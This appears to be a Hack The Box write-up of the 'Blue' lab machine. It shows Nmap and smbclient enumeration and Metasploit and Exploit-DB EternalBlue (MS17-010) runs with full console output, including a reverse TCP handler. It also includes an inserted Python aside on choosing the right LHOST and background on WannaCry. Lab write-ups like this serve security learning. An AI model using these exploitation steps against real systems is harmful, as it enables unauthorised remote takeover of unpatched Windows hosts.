Hack The Box – Blue writeup

This box is very easy, ideal for whoever is starting with hacking. This is a walkthrough and my personal experience with the HTB – Blue box. I’m going to show how I scanned and enumerated the system, which tools I used to root the box, and a common pitfall for people approaching Metasploit for the first time. I’ll also explain what famous vulnerability this box is based on.

Scanning and enumeration

I started with a classic Nmap scan of all the ports of the machine:

root@kali:/home/kali# nmap -T4 -A -p- 10.10.10.40

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 10:41 EST
Nmap scan report for 10.10.10.40
Host is up (0.051s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m05s, deviation: 2s, median: 1m03s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-28T15:44:16+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-28T15:44:17
|_  start_date: 2020-11-28T15:41:38

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   47.74 ms 10.10.14.1
2   48.03 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.71 seconds

It looked like I was dealing with Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) exposing SMB (Server Message Block), a protocol used by Windows systems to provide access to shared files, printers and ports. SMB used to run on top of NetBIOS (an older transport layer) on port 139; since Windows 2000 it runs directly over TCP on port 445.

I wanted to see what else I could gather from the SMB service: whether there were shares that allowed anonymous access, which shares were available, and so on. So I connected to it using smbclient on Kali:

root@kali:/home/kali# smbclient -L \\\\10.10.10.40\\
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Share           Disk      
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Trying to connect to those shares through smbclient didn’t work.

I started to look around for potential exploits related to the OS and services on this box and found a couple of interesting things:
https://www.exploit-db.com/exploits/42315 (Python script for EternalBlue SMB Remote Code Execution (MS17-010))
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/ (Metasploit module for MS17-010)

Exploitation

Searching on Google for MS17-010, and for anything else related to Windows 7 Professional 7601 Service Pack 1 and SMB, I found a Metasploit module that seemed right for this machine.

So I tried it, but it didn’t work:

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.57:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[-] 10.10.10.40:445 - Did not receive a response from exploit packet
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[-] 10.10.10.40:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >


I then tried the Python script for the same vulnerability (MS17-010, EternalBlue), but it gave an error:

kali@kali:~/Downloads$ python3 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Not found accessible named pipe
Done


Another Metasploit module for the same vulnerability, ms17_010_psexec, didn’t work either:

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.57:4444 
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.10.10.40:445 - Timeout::Error
[-] 10.10.10.40:445 - execution expired
[-] 10.10.10.40:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
[*] Exploit completed, but no session was created.


Finally I ran the auxiliary scanner module for MS17-010 to double-check that the host was really vulnerable:

msf5 auxiliary(scanner/smb/smb2) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.10.10.40
rhost => 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > set check_pipe true
check_pipe => true
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   true                                                            no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.10.40                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 10.10.10.40:445       - Named pipe found: \netlogon
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


A common mistake

I knew that the machine was vulnerable to EternalBlue because the OS and service versions on this machine matched the ones described online. And as you can see from the results above, even the scanner module confirmed that the machine should have been vulnerable to EternalBlue. So what went wrong?

It was the first time I was using Metasploit through a VPN to test a target machine, and there’s an issue that’s quite common among beginners (and not only beginners):

If we are testing a box in our local network, for example a Metasploitable machine in a VM or on another laptop on our LAN, we usually have a local IP address (something like 192.168.0.xx).

When connecting to another network over a VPN, as in the case of Hack The Box, we use another interface that has its own IP, which for HTB is something like 10.10.xx.xx.

But when Metasploit sets up a module, it defaults LHOST to the local IP address (starting with 192.168.), rather than the VPN one. Sometimes it’s tricky: you load the options of a module and all looks good. Then you set the payload (which usually has its own LHOST to be set) and that one still has your 192.168.0.xx address. So if you forget to check the options again, as often happens, you would make the same mistake that I did with this box.

So after checking my previous logs, I noticed that the LHOST the first time I ran the ms17_010_eternalblue exploit was 192.168.1.57, my LAN address. Re-running the exploit with the VPN IP as LHOST was successful and BOOM! I got my root access to the box.
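Before starting a handler it is worth checking which local address actually routes to the target. The script below is an added example, not code from the writeup: it models the Kali box from the post with a constructed routing table and interface list, assumes a made-up VPN address 10.10.14.12 on tun0, and flags an LHOST that the target has no route back to.

```python
import ipaddress
import socket

# Constructed interface table: LAN NIC plus the HTB VPN tunnel. The tun0 address
# is made up; the writeup only shows the VPN gateway 10.10.14.1 in the traceroute.
INTERFACES = {
    "eth0": "192.168.1.57",
    "tun0": "10.10.14.12",
}

# Constructed routing table as (destination prefix, outgoing interface). The VPN
# pushes a route for the lab network 10.10.10.0/24 through tun0, while the default
# route stays on the LAN NIC, so a reverse shell to 192.168.1.57 can never arrive.
ROUTES = [
    ("0.0.0.0/0", "eth0"),
    ("192.168.1.0/24", "eth0"),
    ("10.10.14.0/23", "tun0"),
    ("10.10.10.0/24", "tun0"),
]


def route_interface(target, routes=ROUTES):
    """Longest-prefix match: the interface the kernel would send `target` through."""
    addr = ipaddress.ip_address(target)
    best = None
    for prefix, iface in routes:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    if best is None:
        raise ValueError(f"no route to {target}")
    return best[1]


def expected_lhost(target, routes=ROUTES, interfaces=INTERFACES):
    """Address the target must connect back to: the one on the outgoing interface."""
    return interfaces[route_interface(target, routes)]


def check_lhost(lhost, target, routes=ROUTES, interfaces=INTERFACES):
    """Return (ok, expected); ok is False when the handler listens on an address
    the target has no route back to, which is the mistake in the writeup."""
    expected = expected_lhost(target, routes, interfaces)
    return lhost == expected, expected


def os_source_address(target, port=445):
    """Ask the real OS instead of the model: connecting a UDP socket sends nothing,
    but makes the kernel pick the source address it would use for `target`."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect((target, port))
        return s.getsockname()[0]


if __name__ == "__main__":
    ok, expected = check_lhost("192.168.1.57", "10.10.10.40")
    print(f"LHOST 192.168.1.57 ok={ok}, expected {expected}")  # ok=False, expected 10.10.14.12
```

On a live system, `os_source_address("10.10.10.40")` gives the same answer from the real routing table; if it differs from the LHOST shown by `options`, fix it before running the module.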

At that point it was just a matter of looking for the user.txt and root.txt files that had the flags inside them.


EternalBlue: What is it?

Hack The Box machines (and if you have done some CTFs, you will have realised that this is a common thing) often have names that hint at the topic of the machine. In this case the box ‘Blue’ was about the famous EternalBlue.

EternalBlue exploits a vulnerability (CVE-2017-0144 in the CVE catalogue, MS17-010 in Microsoft’s bulletin) and rose to prominence in 2017 when the Shadow Brokers brought it to light; later that year it was used by the WannaCry ransomware. Allegedly the exploit was developed by the NSA.

Simply put, the exploit abuses how the SMBv1 implementation in Windows handles specially crafted packets sent by an attacker, chaining 3 different bugs.

Microsoft released a patch for this vulnerability in April 2017, one month before the Shadow Brokers tweet that made EternalBlue public, but it still managed to do a lot of damage because people (and especially organizations) often don’t patch their machines in a timely fashion.

For a more technical explanation you could read this article.


I have a lot of other writeups for Hack The Box machines that I still have to publish, and I’ll try to do it as soon as possible, so if you are interested in this type of content keep an eye out for future articles or take a look around my website.